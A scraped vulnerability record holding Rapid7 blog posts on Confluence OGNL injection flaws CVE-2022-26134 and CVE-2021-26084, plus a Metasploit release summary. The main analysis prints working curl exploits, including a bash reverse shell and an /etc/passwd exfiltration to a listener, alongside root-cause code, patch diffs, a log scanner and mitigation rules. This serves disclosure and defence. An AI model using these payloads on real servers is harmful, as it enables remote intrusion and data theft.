"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. 
As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. Atlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26134 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc.) or invalid (e.g. 
\u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). 
Note the `X-Cmd-Response: confluence` line in the HTTP response:

    curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
    *   Trying 10.0.0.28:8090...
    * TCP_NODELAY set
    * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)
    > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
    > Host: 10.0.0.28:8090
    > User-Agent: curl/7.68.0
    > Accept: */*
    > 
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 302 
    < Cache-Control: no-store
    < Expires: Thu, 01 Jan 1970 00:00:00 GMT
    < X-Confluence-Request-Time: 1654212503090
    < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly
    < X-XSS-Protection: 1; mode=block
    < X-Content-Type-Options: nosniff
    < X-Frame-Options: SAMEORIGIN
    < Content-Security-Policy: frame-ancestors 'self'
    < X-Cmd-Response: confluence 
    < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true
    < Content-Type: text/html;charset=UTF-8
    < Content-Length: 0
    < Date: Thu, 02 Jun 2022 23:28:23 GMT
    < 
    * Connection #0 to host 10.0.0.28 left intact

Decoding the exploit in the `curl` request shows how this is achieved.
The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server's response to the attacker.

    ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

### Root cause

Our investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.

    at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)
    at ognl.SimpleNode.getValue(SimpleNode.java:193)
    at ognl.Ognl.getValue(Ognl.java:333)
    at ognl.Ognl.getValue(Ognl.java:310)
    at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)
    at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)
    at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)
    at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)
    at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)
    at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)
    at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
    at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
    at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)
    at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)
    at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)

`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated.
As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.

    public class TextParseUtil {
        public static String translateVariables(String expression, OgnlValueStack stack) {
            StringBuilder sb = new StringBuilder();
            // Every ${...} group in the expression is pulled out ...
            Pattern p = Pattern.compile("\\$\\{([^}]*)\\}");
            Matcher m = p.matcher(expression);
            int previous = 0;
            while (m.find()) {
                String str1, g = m.group(1);
                int start = m.start();
                try {
                    // ... and evaluated as OGNL against the value stack
                    Object o = stack.findValue(g);
                    str1 = (o == null) ? "" : o.toString();
                } catch (Exception ignored) {
                    str1 = "";
                }
                sb.append(expression.substring(previous, start)).append(str1);
                previous = m.end();
            }
            if (previous < expression.length())
                sb.append(expression.substring(previous));
            return sb.toString();
        }
    }

`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:

    public void execute(ActionInvocation invocation) throws Exception {
        if (this.namespace == null)
            this.namespace = invocation.getProxy().getNamespace();
        OgnlValueStack stack = ActionContext.getContext().getValueStack();
        // this.namespace is derived from the request URI (see below)
        String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
        String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);

Here `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:

    public static String getNamespaceFromServletPath(String servletPath) {
        // Everything up to (but not including) the last '/' becomes the namespace
        servletPath = servletPath.substring(0, servletPath.lastIndexOf("/"));
        return servletPath;
    }

The result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation.
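To make the chain above concrete, the following Python models the two xwork steps from the call stack (the namespace cut at the last `/` and the `${...}` regex) and then applies them to `conf_access_log` lines, which also covers the access-log evidence discussed under "The vulnerability" and the URI-encoding caveat raised later under "Payloads". This is an added example, not Rapid7's or Atlassian's code; it assumes the access-log layout matches the 7.13.6 entry shown in the post, and the sample log lines are constructed.

```python
"""Model of how a request path reaches OGNL evaluation in CVE-2022-26134, plus a
conf_access_log scanner built on the same logic.  Added example; not Rapid7's or
Atlassian's code."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Same pattern xwork's TextParseUtil.translateVariables uses: ${ ... } with no '}' inside.
OGNL_PLACEHOLDER = re.compile(r"\$\{([^}]*)\}")

# The request shown in the post: the expression sits between the leading and trailing '/'.
PAGE_EXPLOIT_URI = ("/%24%7B%40java.lang.Runtime%40getRuntime%28%29"
                    ".exec%28%22touch%20/tmp/r7%22%29%7D/")

# Layout of conf_access_log.<yyyy-mm-dd>.log as shown in the post (7.13.6 LTS); the
# field order is assumed to be stable across versions.
ACCESS_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] - (?P<thread>\S+) (?P<src>\S+) (?P<method>\S+) "
    r"(?P<uri>\S+) HTTP/\S+ (?P<status>\d+)"
)


def namespace_from_servlet_path(servlet_path: str) -> str:
    """Mirror of ServletDispatcher.getNamespaceFromServletPath: drop the last '/' and
    everything after it.  A servlet path always starts with '/', so rfind() never fails."""
    return servlet_path[: servlet_path.rfind("/")]


def expressions_reaching_ognl(request_uri: str) -> List[str]:
    """Return the ${...} bodies that the unpatched ActionChainResult.execute would hand
    to OgnlValueStack.findValue for this request.  Tomcat percent-decodes the path once
    before WebWork sees it, so a single unquote() reproduces what the server evaluated;
    the query string is not part of the servlet path.  The patched xwork never calls
    translateVariables on the namespace, so this list is exactly what the patch removes."""
    path = unquote(request_uri.split("?", 1)[0])
    if not path.startswith("/"):
        return []
    return OGNL_PLACEHOLDER.findall(namespace_from_servlet_path(path))


def naive_prefix_match(request_uri: str) -> bool:
    """The ASCII-only rule 'path starts with ${ or %24%7B', kept for comparison: it sees
    the post's request but nothing that is encoded differently or sits deeper in the path."""
    stripped = request_uri.lstrip("/")
    return stripped.startswith("${") or stripped.startswith("%24%7B")


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag every logged request whose decoded namespace carries a ${...} expression,
    which is the precise condition under which the unpatched server evaluated OGNL."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        exprs = expressions_reaching_ognl(m["uri"])
        if exprs:
            hits.append({"ts": m["ts"], "src": m["src"], "method": m["method"],
                         "status": int(m["status"]), "expressions": exprs})
    return hits


# Constructed sample log: two benign requests, the entry from the post, and a variant
# using lowercase hex, a bogus method and an expression that is not at the path start.
SAMPLE_LOG = [
    "[02/Jun/2022:16:01:40 -0700] - http-nio-8090-exec-3 10.0.0.5 GET /login.action "
    "HTTP/1.1 200 12ms - - Mozilla/5.0",
    "[02/Jun/2022:16:01:52 -0700] - http-nio-8090-exec-4 10.0.0.5 GET /display/DS/Home "
    "HTTP/1.1 200 40ms - - Mozilla/5.0",
    "[02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET " + PAGE_EXPLOIT_URI
    + " HTTP/1.1 302 20ms - - curl/7.68.0",
    "[02/Jun/2022:16:03:01 -0700] - http-nio-8090-exec-11 10.0.0.28 BALH /pages/%24%7b%40java"
    ".lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29%7d/ HTTP/1.1 302 18ms - - curl/7.68.0",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Dropping the trailing `/` from the post's request makes `expressions_reaching_ognl` return nothing, because the namespace is then cut at the `/` inside `/tmp/r7` and no complete `${...}` survives; that is why the exploit URI ends with `/`.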
At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.

### The patch

On June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.

The patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:

**Before:**

    public void execute(ActionInvocation invocation) throws Exception {
        if (this.namespace == null)
            this.namespace = invocation.getProxy().getNamespace();
        OgnlValueStack stack = ActionContext.getContext().getValueStack();
        String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
        String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);

**After:**

    public void execute(ActionInvocation invocation) throws Exception {
        if (this.namespace == null)
            this.namespace = invocation.getProxy().getNamespace();
        String finalNamespace = this.namespace;
        String finalActionName = this.actionName;

Atlassian also added `SafeExpressionUtil.class` to the `xwork` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked.
For example:

    public Object findValue(String expr) {
        try {
            if (expr == null)
                return null;
            if (!this.safeExpressionUtil.isSafeExpression(expr))
                return null;
            if (this.overrides != null && this.overrides.containsKey(expr))

### Payloads

The OGNL injection primitive gives attackers many options. Volexity's excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).

Java does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It's impossible to demonstrate all of them here, but a reverse shell routed through Java's [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.

    curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

Decoded, the exploit looks like the following:

    ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()")}

And results in a reverse shell:

    albinolobster@ubuntu:~$ nc -lvnp 1270
    Listening on 0.0.0.0 1270
    Connection received on 10.0.0.28 37148
    bash: cannot set terminal process group (34470): Inappropriate ioctl for device
    bash: no job control in this shell
    bash: /root/.bashrc: Permission denied
    confluence@ubuntu:/opt/atlassian/confluence/bin$ id
    id
    uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)
    confluence@ubuntu:/opt/atlassian/confluence/bin$

Of course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.

    curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/

When decoded, the reader can see that we have again relied on the Nashorn scripting engine.

    ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();")}

Again, the attacker is listening for the exfiltration, which looks, as you'd expect, like `/etc/passwd`:

    albinolobster@ubuntu:~$ nc -lvnp 1270
    Listening on 0.0.0.0 1270
    Connection received on 10.0.0.28 37162
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    … truncated …

Finally, note that the exploit could be entirely URI-encoded as well. Any detection logic that relies on **just** the ASCII form will be quickly bypassed.

## Mitigation guidance

Atlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available; note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.

Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.

If you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084.
For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).

## Rapid7 customers

**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:

* A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3
* A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3

**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:

* Confluence Java App Launching Processes

The Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.

**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any URL path starting with `${` or `%24%7B`.

## Updates

**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.

**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied.
Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.

**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**

**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.

**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.

**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.

Attacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase.
Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.

Source record: Rapid7 blog, "Active Exploitation of Confluence CVE-2022-26134", published 2022-06-02, https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/. CVSS v3.1 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

# Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084

_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light._

On August 25, 2021, Atlassian [published details](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) on [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability arises from an OGNL injection flaw and allows unauthenticated attackers to execute arbitrary code on Confluence Server or Data Center instances. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.

Proof-of-concept exploit code has been publicly available since August 31, 2021, and both Rapid7 and community researchers have observed active exploitation as of September 2. **Organizations that have not patched this Confluence Server and Confluence Data Center vulnerability should do so on an emergency basis.**

For a complete list of fixed versions, see [Atlassian's advisory here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>).

For full vulnerability analysis, including triggers and check information, see [Rapid7's analysis in AttackerKB](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>).

## Rapid7 customers

Rapid7's Managed Detection and Response (MDR) team has observed active exploitation against vulnerable Confluence targets.
InsightIDR customers should ensure that the Insight Agent is installed on all Confluence servers to maximize post-compromise detection visibility.

InsightVM and Nexpose customers can assess their exposure to [CVE-2021-26084](<https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26084/>) with remote vulnerability checks as of the August 26, 2021 content release.

## Updates

**September 2, 2021:**
The Rapid7 Threat Detection & Response team added or updated the following detections to InsightIDR to help you identify successful exploitation of this vulnerability:

* **Suspicious Process - Curl Downloading Shell Script** detects when the Curl utility is being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.
* **Suspicious Process - Confluence Java App Launching Processes** identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084, a vulnerability for Confluence disclosed in August 2021 which can allow execution of arbitrary processes.
* **Suspicious Process - Common Compromised Linux Webserver Commands** identifies commands that Rapid7 has observed being run on compromised Linux webservers.

**September 3, 2021:**
Attacks are continuing to increase, therefore Rapid7 has updated the patching priority to "patch on an emergency basis."

The US Cyber Command has tweeted guidance asking for organizations to ["patch immediately"](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) as "this cannot wait until after the weekend."

CISA has also released a [ransomware awareness guide](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) for holidays and weekends.

Current attacks have been focused on deploying coin miners, but the pivot to deploying ransomware may not take long.

**September 7, 2021:**
Atlassian has updated their [advisory on CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) to note that the vulnerability is exploitable by unauthenticated attackers _regardless of configuration._ Widespread exploitation is ongoing.

Source record: Rapid7 blog, "Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084", published 2021-09-02, https://blog.rapid7.com/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

# Metasploit Wrap-Up

## We just couldn't contain ourselves!

This week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you, provided you have the Kubernetes JWT token and access to the Kubernetes REST API.
These modules can even be run through a compromised container that may be running on the Kubernetes cluster.

## Atlassian Confluence WebWork OGNL Injection gets Windows support

You might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7's own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.

## New module content (2)

* [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.
* [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.

## Enhancements and features

* [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) - Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.
* [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) - Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.
* [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) - Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.

## Bugs fixed

* [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) - Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)
* [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the
